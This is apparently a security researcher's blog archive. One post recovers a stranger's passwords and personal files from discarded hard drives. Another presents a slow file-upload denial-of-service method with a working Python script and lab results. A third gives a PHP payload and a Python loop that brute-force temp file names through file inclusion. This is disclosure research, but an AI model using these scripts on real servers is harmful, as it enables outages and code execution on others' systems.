Category Archives: Security

Don’t litter

I’ve always hated it when people throw their trash around. My opinion of someone can go from “respectable citizen that I look up to” to “obvious douchebag who doesn’t respect anyone but him/herself” if I see them throw stuff on the ground. I often see people do it, and I try to lecture them whenever I catch them in the act. My hope is of course that they will feel at least some bit of shame and maybe change their behaviour in the future.

Anyway, so near our apartment there’s this recycling station. A few containers where you can throw paper, plastic, metal and glass. The usual. Once a week this pile of crap shows up. It almost always follows the same pattern and always ends up at the same spot, which makes me think that it might be the same person doing it. The trash in the pile is usually empty boxes from some fast food place (kebab, and then some text in Arabic or something) and then usually a few electronics.

It always irritates me, to the point where I would like to catch them in the act. But I never do. Well, until now. Or, I didn’t really catch them in the act; it was more about what they dumped this time. On Wednesday this week, in the morning when I was leaving some plastic in the container, I noticed something in the “illegally placed trash pile”. Two computers (my time to shine)! I checked if there were any hard drives in them, and there were. So I decided that if the machines were still there when I came back after work, I would go there with a screwdriver and take out the drives. I was a bit worried since it was the day when they usually empty the containers, so the risk was that they would just take the computers with them when they emptied everything else.

When I came back after work, the containers were empty but the computers were still there on the ground. So I went home, got a screwdriver and went back. It was a strange case with a locking mechanism for the hard drives that was not easy to get off. Also, while I was sitting there in the dark with my screwdriver and flashlight, someone came to empty their recyclables. I quickly stood up and hid my stuff under a plastic bag, then proceeded to empty some plastic I had brought with me into the container (to seem less suspicious; it’s all about the looks!). When the person had left I continued with my secret mission, and managed to take out all three drives.

I plugged them into my dock at home and took a quick look at the first drive. Not wiped, as expected, with Windows Vista installed (bleh). I created a virtual drive for VirtualBox so that I could try to boot the operating system on it.

VBoxManage internalcommands createrawvmdk -filename "henrietta.vmdk" -rawdisk /dev/sdg
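To boot from it, the resulting vmdk can then be attached to a VM like any other disk image. Something along these lines, where the VM and controller names are made up for the example (and note that accessing the raw disk normally requires root):

VBoxManage storageattach "henrietta-vm" --storagectl "SATA" --port 0 --device 0 --type hdd --medium henrietta.vmdk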

However, the operating system was damaged and the repair process didn’t seem to work. It might have been a driver issue, since it tried to load some ATI drivers before it crashed every time. I wasn’t too interested in spending a large amount of time on this, so I proceeded to just look at the data on the drive from my Linux machine. It appears to have been owned by a Ukrainian lady (both machines seem to have been owned by her). They could of course have been stolen from her, so I shouldn’t be too quick to blame. But I ruled that out, as the browser history and the programs installed all followed a consistent pattern, and all accounts saved in the browser (Chrome) used the same email and password. For the sake of our lady of the day (Henrietta), I will not disclose any detailed personal info.

The first hard drive, the one with Windows Vista, contained everything I would need to hijack the target’s Internet life.

  • Browser history
  • Cookies
  • Email address (henr*************)
  • Account names
  • Passwords
  • Personal files (A lot of text documents)
  • Images (hundreds)
  • Videos
  • Music

And loads of other sensitive data. I took a look at the data and then I threw everything away. No accounts were ever tested or anything unethical like that. One could argue that just taking these drives was unethical, but if you throw something on the ground with the intention of dumping it where it’s not supposed to be, you sort of resign your ownership of it. Still, there is the possibility of the machines being stolen. But neither of the operating systems on them worked, and the hardware was very old; some of the cards were even visibly broken. So I doubt they were stolen and then dumped there. Why would a thief go to the trouble of dumping them at “almost” the right location?

The second hard drive followed the same pattern but had Windows XP installed on it. The same user and the same type of websites had been visited. It also had a data partition with hundreds of family photos, photos of the suspected owner, and all sorts of sensitive personal data.

The third drive was completely dead and I didn’t put any more time into it.

All drives will be given to a friend who will physically destroy them (take them apart and render them useless).

Anyway, if you’re a complete ass who can’t take responsibility for your crap and just throws everything around you as you please, at least don’t dump crap that could potentially be traced back to you. Or, maybe continue, so that it’s easier to catch you. Right, Henrietta?

Denial of service – Evil is an art form


This article was originally planned to be one part of a larger project, where a presentation at the developer conference Öredev was the second part. However, the presentation at Öredev got cancelled (I have stage fright, so I don’t mind really). I have instead decided to put more energy into the writing part of this little project, do more tests and try to present some more interesting results.

The idea started with “People are so creative at messing up servers these days. I wanna do that”. And it ended in just that. People involved in some projects affected by this method have stated that they are either not vulnerable, or that this attack is not dangerous and should not be considered a vulnerability. Some of these statements are covered further down in the text. The first idea was born several years ago when I wrote a script called “Tsunami”, which simply bombs a server with file uploads. Not very efficient, and I later abandoned the project as I could not get any interesting results out of it. The project was brought back to life not too long ago, and the very simple Tsunami script served as the base for the new Hera tool described below.


By uploading a large number of files to different server setups, and not finishing the uploads (utilizing slow attack methods), one can achieve one or several of the following effects:

  • Make the server unresponsive, or have it respond with an internal server error message
  • Fill up the disk space, with varying results depending on the server setup
  • Use up RAM and crash the whole server

Basically, it comes down to the huge number of temporary files being saved to disk, the massive number of file handles being opened, or the data being stored in RAM instead of on disk. Which of the results above you get depends heavily on what type of server is used and how it is set up. The following setups were tested and are covered in this article.

  • Windows Server with Apache
  • Windows Server with IIS 8
  • Linux server with Apache
  • Linux server with Nginx

It should be noted that some of these effects are similar or identical to those of other attacks such as Slowloris or Slow POST. The difference is that some servers handle file uploads differently, and sometimes rather badly. This of course has different effects depending on the setup.

So here’s the thing

The original Tsunami script simply flooded a server with file uploads. The end result on a very low-end machine was that the disk space eventually ran out. But it was so extremely inefficient that it was not worth continuing the project. So this time I needed to figure out a way to keep the server from removing the files. For my initial testing while developing the tool, I used Apache with mod_php on Linux. Most settings were defaults, apart from a few modifications to make the server allow more requests and, in some cases, be more stable, as you will see later in this article when I list all the server results.

Now, the interesting part about uploading a file to a server is that the server has to store the data somewhere while the upload is being performed. Storing it in RAM is usually a very bad idea, since it can lead to memory exhaustion very quickly (although some still do this, as you will see later in the results). Some will store the data in temporary files, which seems more reasonable. In the case of mod_php, the data is stored in a temporary file as it is uploaded, before it ever reaches your script/application. This was the first important thing I learned that made this slightly more exciting for me, because it means that as long as we can reach a PHP script on a server, any script, we can upload a file and have it stored temporarily. Of course, the file will be removed when the script has finished running, which was the problem with the Tsunami script (I made a script that ran very slowly to test this out; didn’t get very promising results either way).

The code responsible for the upload can be found here.

The RFC in question for reference

This part is interesting, since I needed to confirm what the default settings for file uploads were. If the default were to not allow file uploads, this attack would be slightly less interesting.

Luckily, it is set to On by default.
This means that given any standard Apache installation with mod_php enabled, and at least one known PHP script reachable from the outside, this attack can be performed.
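For reference, these are the relevant php.ini directives together with their stock defaults (as documented for PHP 5.x; distributions sometimes ship other values, so check your own php.ini):

file_uploads = On        ; HTTP file uploads allowed by default
upload_tmp_dir =         ; empty means the system default, e.g. /tmp on Linux
upload_max_filesize = 2M
max_file_uploads = 20    ; max file parts per request
post_max_size = 8M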


As seen here, the file is uploaded to a temporary folder (normally /tmp on Linux) with a “php” prefix.


Checking a more recent version of PHP yields the same result.
Below is the latest commit as of 2016-10-20.


So now that I have confirmed the default settings in PHP, I can start experimenting with uploading files. A simple Apache installation on a Debian machine with mod_php enabled, and a test.php under /var/www/, should be enough. The test.php could theoretically be empty; this should work either way. Uploading a file is easy enough: create a simple form in an HTML file and submit it with a file selected. Nothing new there. The file will get saved in /tmp, and the information about the file will be passed on to test.php when it is called. Whether test.php does something with the file is irrelevant; it will still be deleted from /tmp once the script has finished. But we want it to stay in the /tmp folder for as long as possible.
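The same benign test can of course be scripted instead. A minimal sketch in Python using the requests library (the URL and field name are placeholders for your own test setup):

import requests

# One well-formed upload: mod_php writes the file to /tmp while the
# request is handled, and deletes it as soon as test.php finishes.
files = {"userfile": ("hello.txt", b"A" * 1024, "text/plain")}
r = requests.post("http://192.168.56.101/test.php", files=files)
print(r.status_code)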

After playing around in Burp for a while, I came to think about how Slowloris keeps a connection alive by sending headers very slowly, making the server prolong the timeout period for (sometimes) as long as the client wants. What if we could send a large file to the server and then not finish it, and make the server think we intend to finish the upload by sending one byte at a time with very long intervals?

Sure enough: by setting a Content-Length header larger than the actual data we have uploaded, we can keep the file in /tmp for a long period, as long as we send some data once in a while (how long depends on the timeout settings). The original Content-Length of the request below was 16881, but I set it to 168810 to make the server wait for the rest of the data.
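Reconstructed, such a request looks roughly like this (the boundary and field names are made up; the only parts that matter are the inflated Content-Length and the fact that the body is never completed):

POST /test.php HTTP/1.1
Host: 192.168.56.101
Content-Type: multipart/form-data; boundary=----hera
Content-Length: 168810

------hera
Content-Disposition: form-data; name="userfile"; filename="junk.bin"
Content-Type: application/octet-stream

[ ~16 KB of file data, after which the client simply goes quiet ]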


If we check /tmp, we can see that the file is indeed there.


The default settings allow us to upload a total of 20 files in the same request, with a max POST size of 8 MB. This makes the attack more useful, as we can now open 20 file descriptors per request instead of just 1 as I had assumed before. In this first test I didn’t send any data after the first chunk, so the files were removed when the request timed out. But all the files sent were there for the duration of the request.
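The core trick fits in a few lines. Here is a minimal Python sketch of the idea (this is not Hera’s actual code; the target, sizes and timings are placeholders, and a single connection is shown where Hera opens thousands in parallel):

import socket, time

TARGET, PORT = "192.168.56.101", 80     # placeholder lab server
NUM_FILES, FILE_SIZE = 20, 300 * 1024   # 20 file parts at ~0.3 MB each

# Build a multipart body with NUM_FILES file parts so that mod_php
# creates one temporary file per part. The closing boundary that would
# complete the request is deliberately never sent.
body = b""
for i in range(NUM_FILES):
    body += (b"------hera\r\n"
             b'Content-Disposition: form-data; name="f%d"; filename="f%d.bin"\r\n'
             b"Content-Type: application/octet-stream\r\n\r\n" % (i, i))
    body += b"A" * FILE_SIZE + b"\r\n"

# Content-Length is inflated far past what we will actually send.
headers = ("POST /test.php HTTP/1.1\r\n"
           "Host: %s\r\n"
           "Content-Type: multipart/form-data; boundary=----hera\r\n"
           "Content-Length: %d\r\n\r\n" % (TARGET, len(body) * 10))

s = socket.create_connection((TARGET, PORT))
s.sendall(headers.encode("ascii") + body)
while True:
    time.sleep(30)   # stay under the server's request timeout
    s.sendall(b"A")  # trickle one byte to keep the upload alive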


Again, all the files are saved as separate files in /tmp.


Okay fine, so it works. Now what?

Well, now that I can persist a number of files on the target system for the duration of the request (which I can prolong via a slow HTTP attack method), I need to write a tool that can utilize this to attack the target system. This is how the Hera tool was born (don’t put too much thought into the name; it made sense at first when a friend suggested it, but we can’t remember why).


The version above is an older one, and if you want to test the tool I recommend cloning the repository from GitHub (linked above). The newest version has support for gzip. However, the gzip experiment did not produce the results I expected, so support for sending gzip-compressed data will be removed from the tool in the future. The tool compiles and works just fine as it is right now, though. As the idea is to open a ton of connections to a target server, it is essential that you increase the number of file descriptors your system allows you to use. This is usually set to something around 1024. The limit I have set in the example below can be anything, as long as you don’t reach it during a test, because then the test might fail.
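On Linux this is typically done with ulimit -n in the shell before starting the tool. If you are driving things from Python instead, the equivalent is a sketch like this:

import resource

# The per-process open-file limit is often 1024 by default; raise the
# soft limit to the hard limit so thousands of sockets can be open at once.
soft, hard = resource.getrlimit(resource.RLIMIT_NOFILE)
resource.setrlimit(resource.RLIMIT_NOFILE, (hard, hard))
print("fd limit now:", resource.getrlimit(resource.RLIMIT_NOFILE))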


This is also covered in the readme on github that I linked earlier.

Okay so how does this affect different servers?

Together with a colleague (Stefan Ivarsson), I made and documented a number of tests of the effects this has on different systems. The effects differ quite a bit, and if you want to know whether this works on your own setup or not, the best way is to simply test it in a safe environment (like a test server that is separated from your production environment).

Setup 1
Operating system: Debian (Jessie, VirtualBox)
Web server: Apache (2.4.10)
Scripting module: mod_php (PHP 5.6.19-0+deb8u1)
Max allowed files per request: 20 (Default)
Max allowed post size: 8 MB (Default)
CPU Core: 1

So basically, what this meant for the test was that I could set my tool to send 20 files per request with a max size of 0.4 MB each, but to give some margin for headers and such, I set it to 0.3 MB per file. There are two different ways I wanted to test this attack. The first is to send files that are as large as possible, which would fill up the disk space and hopefully disrupt services as the machine runs out of space. The second is to send as many small files as possible and stress the server by opening too many file handles. As it turns out, both methods work against different servers and setups, and both can prove fatal for the server depending on certain factors (setup, RAM, bandwidth, disk space and so on).

So during the test with the above setup, I set the Hera tool to attack using 2500 threads and 2 sockets per thread, with 20 files per request and each file set to 0.3 MB. That is 2500 × 2 × 20 × 0.3 MB = 30 GB worth of data being sent to the server, so if it doesn’t dispose of that information, it will have to save it either on disk or in RAM, and neither is big enough. What happened was rather expected, actually.

It should be noted that the default Apache installation allowed very few open connections, leading to a normal Slowloris effect. This is not what I was after, so I configured the server to allow more connections (each thread is about 1 MB with this setup, making it very inefficient, but don’t worry, there are more test results further down). The server ran out of memory because of too many spawned Apache processes.


When the RAM was increased, the disk space eventually ran out on the server instead.

As expected, the number of files in the tmp folder exploded, and the server’s CPU usage stayed high the whole time (until the disk space ran out, of course, at which point no more files could be created).

During the attack the Apache server was unresponsive from the outside; when the HDD space ran out, it became responsive again.

An interesting effect actually appeared when I decided to halt the attack: the CPU went up to 100%, since the machine had to kill all the processes and remove all of the files. So I took this chance to immediately start the attack again to see what would happen. The CPU stayed at 100% as the machine continued its attempts to remove the files and processes while I was forcing it to create new ones at the same time.

Setup 2
Operating system: Windows Server 2012 (VirtualBox)
Web server: Apache (WAMP)
Scripting module: mod_php (PHP 5)
Max allowed files per request: 20 (Default)
Max allowed post size: 8 MB (Default)
CPU Core: 1

This test was conducted in a similar manner to the first one. It resulted in Apache being killed because it ate too much memory. The disk space also ran out after a while. The system became very unstable, and applications were killed one after another to preserve memory (Firefox and the Task Manager, for example). At first the same effect was reached as the connection pool ran out, but increasing the limit “fixed” that. The mpm_winnt_module was used in the first test. A more robust setup is presented in a later test.

As you can see in the image above, the tmp files are created and persist throughout the test as expected.

The system starts killing processes when the RAM starts running out, so we are still seeing effects similar to those of a normal Slowloris attack (that is, the Apache processes take up a lot of memory for every thread started; this is nothing new).

But we are still getting our desired effect of a huge number of files being uploaded and filling up the disk space, so that still works. After increasing the virtual machine’s RAM to 8 GB, the Apache server did not get killed during the attack. The server was mostly unresponsive during the attack, and by setting the tool’s timeout very low and the file size very small, the server’s CPU load could be kept at around 90-100% constantly (since it was creating and removing thousands of files all the time). At one point the Apache process stopped accepting any connections, even after the attack had stopped, although this could not be reproduced very easily, so I have yet to verify the cause. Another interesting effect of the attack was that the memory usage went up to 2.5-3 GB and never went down again after the attack had finished (trying to create a dump of the Apache process memory after the attack messed up the machine heavily, so I gave up on that for now).

The picture above was taken when the process became unresponsive and stopped accepting connections. That effect cannot be seen in the picture itself; what it shows is the memory usage several minutes after the attack had stopped.

Setup 3
Operating system: Debian (VirtualBox)
Web server: nginx
Scripting module: PHP-FPM (PHP 5)
Max allowed files per request: 20 (Default)
Max allowed post size: 1 MB (Default)
CPU Core: 1

In this test I tried the same tactics as before. One thing I immediately noticed was that with a lot of connections and few files per request, the max allowed connections limit was hit pretty fast (which is not surprising).

But with a lot of small files per request, something more interesting happened instead. The server seemed to hit a max-open-files limit, which resulted in a 500 internal server error rather than a refused connection. Setting a small number of files but increasing the file size appeared to have the same effect, however, so this is probably the same effect as a Slow POST attack.

Changing worker_connections in /etc/nginx/nginx.conf to a higher value mostly fixed the first problem, the large number of Slowloris-like connections (with a small number of files only). But increasing the number of files per request to the maximum (20) quickly downed the server again, leaving only an internal server error message. Changing the size of the data sent had the same effect, of course.
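For reference, the directive lives in the events block of nginx.conf. The value below is just an example, not a recommendation:

events {
    # Debian ships 768 by default; raising it trades plain connection
    # exhaustion for the file-creation effects described above
    worker_connections 10240;
}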

One thing I noticed is that nginx does not hand the data over to PHP until the request has finished transmitting. This does not stop the creation of files, since nginx needs to create temporary files as well, but it does prevent the large number of files from being created, as nginx will only create one file per request instead of up to 20 like mod_php.

Setup 4
Operating system: Windows Server 2012 (VirtualBox)
Web server: IIS 8
Scripting module: ASP.NET
CPU Core: 1

This test ended very similarly to the nginx one. The server seems to have saved the data in a single temporary file, and it did not seem to have much of a problem with the number of connections to the server. In the end, when maxing out the attack from the attacking test machine, the web server became unresponsive about 8 times out of 10. This was most likely more of a Slowloris/Slow POST type of effect than a result of a lot of files being created. More tests could be made on this setup to further investigate methods of bringing the server down, but because of the relatively poor result (compared to the other setups) I decided to leave it at that for now. The server can be stressed, no doubt about that, but not in the way I intended for this experiment.

Setup 5
Operating system: Debian (Amazon EC2, m4.xlarge)
Web server: Apache
Scripting module: PHP-FPM (PHP 7)
Max allowed files per request: 20 (Default)
Max allowed post size: 8 MB (Default)
CPU Core: 1

This test was very special, and it was the last big test I wanted to make. The goal was to try the attack method on a larger, more realistic setup in the cloud. To do this I took the help of Werner Kwiatkowski, who (in exchange for candy, herring and beverages) helped me set up a realistic and stable server that could take a punch.

The first problem I had as the attacker was that the server would only create a single temporary file per request, instead of the maximum of 20 I was expecting. The second “problem” was that the server became unresponsive in a Slowloris/Slow POST kind of manner instead of being affected by my many uploaded files. This was because Werner had set it up in such a way that the server would rather become unresponsive than crash catastrophically. This is of course preferable, and it defeated my tool in a way. So, to get my desired effect I actually had to raise the server’s max allowed connections a lot, so that I could see the effects of all the files being created. This of course differs from my initial idea of only testing near-default setups, but I felt it was important to have some more realistic samples as well. And yes, I used that tweaked setup for the final test.

The number of files specified above seemed to be the max I could reach. However, after the limit was reached, something very interesting happened: the server appeared to store the files that could not be written to temporary files in memory instead. This made the RAM usage go completely out of control very quickly. It took a while for the attack to actually use up all of that RAM, but after about 30 minutes or so it had finally managed to fill it all up.

The image above was taken about a minute before the server stopped responding and crashed because of memory exhaustion.

Logging into the AWS account and checking the EC2 instances makes it clearer that the node has crashed. Now, this could of course still mean that the effects we are seeing are the effects of a Slowloris attack, where the spawned processes are the ones using up all the memory. To test that, I ran the same test with a Slowloris attack tool against this setup. The result was actually not that impressive, even when I tried using more connections than with the Hera tool.

As you can see, the memory usage for the same number of threads/connections used is not even close. That is because this particular setup is not vulnerable to the normal Slowloris attack, nor to Slow POST (I did not try Slow Read and other slow attacks).

This time dumping memory was a lot easier, so I could check whether the data was still stored in memory even while the attack was idle (as in, not currently transmitting a lot of data, simply waiting for the timeout to occur). The payload data could be found in the process memory, which explains why the RAM usage went out of control like it did. I have not investigated this any further, though.

So, in summary

I would like to think that this method could be used for some pretty bad stuff. It’s not an entirely new attack method, but rather a new way of performing slow attacks against servers that handle file uploads badly. Not all of the setups were vulnerable to this method, but most of them were either vulnerable to it or to other slow attacks, which became apparent during the tests (for example, Slow POST on the nginx setup).

This method can be used for more than crashing servers. It can be used in an attack to guess temporary file names when you only have a file inclusion vulnerability at your disposal. You can read the start of that project here.

When I started playing around with this method, I contacted Apache, PHP and Red Hat to see what they had to say about it. Apache said it does not directly affect them (which is true, since in the case of mod_php it is in the hands of the PHP team). PHP said that it was not a security issue and that file uploads are not turned on by default. If you have read this article, you will see that this is simply not true, and I have asked them to clarify what they mean by that, without getting an answer. Red Hat was extremely helpful and even set up a test machine for the tool so they could see the effects. However, they did not deem this a vulnerability and closed the case. I still think it’s an interesting method, and I also feel it should be okay for me to post this now without regretting it later for breaking any responsible disclosure policies.

Thanks for reading!

Local file inclusion with tmp files

A thing I noticed while writing the Hera tool and doing all the tests is that some server setups did not use very good randomness in their temporary file names. This opens up some interesting opportunities if you happen to have found a local file inclusion vulnerability in an application.

Imagine the following, not very good, code in an application; the textbook version of the pattern looks something like this (the parameter name is just an example):
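<?php
// Classic local file inclusion: a user-supplied path flows straight
// into include() with no validation whatsoever.
include($_GET['page']);
?>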

Looks bad, and I promise this is not that unusual; we find it from time to time during our reviews.

And here are some temporary files that were created in the WAMP test I did while writing the Hera article. Notice that the random string after the “php” prefix is rather short and should be easy to predict or brute force.

So to test this I modified Hera a bit, or more specifically the tool’s payload builder, to append a piece of PHP code to the end of every file uploaded to a server.
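The appended payload only needs to be a single line of PHP. One way to write it (a reconstruction, not necessarily the exact payload used; splitting the string keeps the marker from appearing literally in the raw file, so a hit really means the code was executed):

<?php echo "ThisShould" . "NotExist"; ?>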

Notice the “ThisShouldNotExist”: if the code gets executed, that text will show up on the vulnerable page. Now we need another tool that constantly tries to include a set of temporary files that we think will show up eventually. I wrote a simple Python script for this.
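The script boils down to a loop like this sketch (the URL, parameter, temp directory and name format are assumptions based on the WAMP setup above):

import requests

BASE = "http://192.168.56.101/vuln.php?page="  # hypothetical LFI endpoint
TMP = "C:/wamp/tmp/"                           # assumed upload_tmp_dir on the target
MARKER = "ThisShouldNotExist"

# Windows-style mod_php temp names: "php" + a short hex part + ".tmp",
# which leaves a small space of guesses to sweep over and over.
while True:
    for guess in range(0x10000):
        name = "php%X.tmp" % guess
        if MARKER in requests.get(BASE + TMP + name).text:
            print("payload executed via", name)
            raise SystemExit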

And then we run the two tools, wait a little while and see the result. Notice how small the files are, to make the process quicker; we are not interested in sending a lot of data to the server this time. Of course, this could all be optimized greatly, and right now the Hera tool uploads its set of files like normal. A more optimal solution would be to have Hera upload a set of files, then restart the attack so that a new set of tmp files is created on the server, thus raising the chance that one of our guessed tmp file names is created.

Now, this was on Windows, and the code for creating temporary files in mod_php differs depending on the operating system. The default function on Linux is more secure, but it could still be attacked (although it would take a lot more time). I will build a proof of concept for the Linux scenario as well, and update this article when it’s finished. But for now you will have to be satisfied with these results :-).

As you can see in the image above, the names are both more random and longer on Linux, making them a lot harder to guess. The code below shows some Windows-specific code related to the creation of the temporary file. The complete code can be found in the link below.

Linux uses the mkstemp function to create the random strings for its file names. This is pretty secure, but not foolproof. As mentioned earlier, I will update this article when I have test data for this scenario as well. More to come.
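Back-of-envelope, assuming the name formats seen above: the Windows names leave at most 16^4 = 65,536 possibilities, a space an LFI loop can sweep quickly, while mkstemp’s six-character suffix drawn from roughly 62 characters gives 62^6 ≈ 5.7 × 10^10, which is why the Linux case needs far more time or far more simultaneously persisted files.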

UPDATE – 161129: I’ve tried to contact the PHP security team about this (twice) and have not received a single response. I have therefore decided to just post this now, and to post all future results relating to this issue as well.